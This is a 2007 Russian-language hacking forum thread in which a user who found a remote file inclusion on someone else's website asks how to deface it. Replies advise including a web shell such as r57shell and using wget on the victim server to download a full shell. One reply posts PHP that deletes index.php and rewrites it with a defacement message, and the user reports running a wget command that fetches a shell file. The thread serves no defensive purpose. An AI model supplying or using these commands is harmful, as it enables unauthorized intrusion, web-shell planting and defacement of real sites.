ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Не работает system("echo Hacked > index.php");
  #1  
Старый 19.08.2007, 16:14
Аватар для blackbarrie
blackbarrie
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме:
158327

Репутация: 0
По умолчанию Не работает system("echo Hacked > index.php");

Нашёл на сайте удалённый инклуд. Могу подключать и выполнять любые PHP скрипты. Но есть одно но
Я не могу на том сервере создавать и писать в файлы
PHP код:
system("echo Hacked > index.php"); 
не работает. Через
PHP код:
fopen("index.php""w"
тоже ессно ничего не выходит
Как можно это обойти?

И вопрос в догонку:
Как мне получить список файлов каталога, который находится на порядок выше?
PHP код:
  echo system("cd ../");
  
$cmd "ls";
  echo 
"command: <b>" $cmd "</b><br>";
  echo 
system($cmd); 
не работает...
 
Ответить с цитированием

  #2  
Старый 19.08.2007, 16:34
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

system() может быть запрещено использовать сервером
по поводу fopen() - это уже странно.. ты уверен, что прав хватает? я сомневаюсь...
 
Ответить с цитированием

  #3  
Старый 19.08.2007, 16:46
Аватар для blackbarrie
blackbarrie
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме:
158327

Репутация: 0
По умолчанию

system разрешён. потому как
PHP код:
  $cmd "ls"
  echo 
"command: <b>" $cmd "</b><br>"
  echo 
system($cmd); 
выполняется на ура.
А вот то что прав не хватает - скорее оно так и есть. Что можно предпринять в этом случае?
 
Ответить с цитированием

  #4  
Старый 19.08.2007, 16:55
Аватар для ShAnKaR
ShAnKaR
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474

Репутация: 1424


Отправить сообщение для ShAnKaR с помощью ICQ
По умолчанию

проинклудь шел какойнить и посмотри
 
Ответить с цитированием

  #5  
Старый 19.08.2007, 17:22
Аватар для blackbarrie
blackbarrie
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме:
158327

Репутация: 0
По умолчанию

Пытался проинклудить r57shell, но в итоге получаю пустую страницу...
 
Ответить с цитированием

  #6  
Старый 19.08.2007, 17:31
Аватар для Termin@L
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

Цитата:
Сообщение от blackbarrie  
Нашёл на сайте удалённый инклуд. Могу подключать и выполнять любые PHP скрипты. Но есть одно но
Я не могу на том сервере создавать и писать в файлы
PHP код:
system("echo Hacked > index.php"); 
не работает. Через
PHP код:
fopen("index.php""w"
тоже ессно ничего не выходит
Как можно это обойти?

И вопрос в догонку:
Как мне получить список файлов каталога, который находится на порядок выше?
PHP код:
  echo system("cd ../");
  
$cmd "ls";
  echo 
"command: <b>" $cmd "</b><br>";
  echo 
system($cmd); 
не работает...
Не понял, зачем использовать echo c system(). Результат она и так на экран выводит.
Команда для листинга верхнего каталога -
ls /../
 
Ответить с цитированием

  #7  
Старый 19.08.2007, 17:34
Аватар для blackbarrie
blackbarrie
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме:
158327

Репутация: 0
По умолчанию

Опа, спасибо... а я пытался сделать
PHP код:
system("ls ../"); 

Цитата:
Не понял, зачем использовать echo c system(). Результат она и так на экран выводит.
буду знать

Но всё же, как задефейсить в данном случае?
 
Ответить с цитированием

  #8  
Старый 19.08.2007, 17:42
Аватар для Termin@L
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

С помощью качалки стоящей на сервере скачиваешь полноценный шелл - это либо wget, curl и т.д. если не стоит ничего есть команда lwp-mirror, почитай вобще в гуглу
что-то типа - system('wget http://shell.php')
 
Ответить с цитированием

  #9  
Старый 19.08.2007, 17:48
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

PHP код:
unlink('index.php');
$data='Hekked';
$fp=fopen('./index.php','wb');
fputs($fp,$data);
fclose($fp); 
__________________
 
Ответить с цитированием

  #10  
Старый 19.08.2007, 18:10
Аватар для blackbarrie
blackbarrie
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме:
158327

Репутация: 0
По умолчанию

Выполняю комманду system('wget http://site/shell.txt'), а потом system('ls')
Изменений не видно...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Продаю самые Красивые номера. Красивые 5,6 знаки. Кирпич ICQ - Покупка, продажа 3 09.04.2004 18:45



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ